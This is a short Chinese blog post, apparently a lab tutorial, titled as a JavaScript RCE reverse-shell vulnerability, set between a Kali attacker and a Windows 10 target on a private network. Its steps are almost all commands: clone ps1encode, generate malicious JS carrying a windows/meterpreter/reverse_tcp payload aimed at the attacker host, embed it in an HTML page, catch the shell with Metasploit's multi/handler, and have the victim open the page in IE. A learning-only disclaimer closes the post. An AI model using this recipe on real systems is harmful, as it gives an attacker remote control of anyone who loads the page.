环境要求
kali攻击机
192.168.232.131
win10靶机
192.168.232.140
拉取工具到kali的根目录下
1 | git clone https://github.com/CroweCybersecurity/ps1encode.git |
给权限
1 | chmod +x pslencode |
生成恶意js代码
1 | ./ps1encode.rb --lhost 192.168.232.131 --lport 4444 --payload windows/meterpreter/reverse_tcp --ENCODE cmd -t js |
将生成的js代码放入一个js文件中,并通过HTML文件引入
使用msf框架监听
use exploit/multi/handler Set lport 4444 Set lhost 192.168.232.131 run
靶机使用IE浏览器访问做好的HTML文件(此文件引入了恶意的js代码)
成功(PS:4444端口没成功,临时换成8848)
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!
本文链接:https://www.xy586.top/37891.html
转载请注明文章来源:行云博客 » 基于JavaScript的rce反弹shell漏洞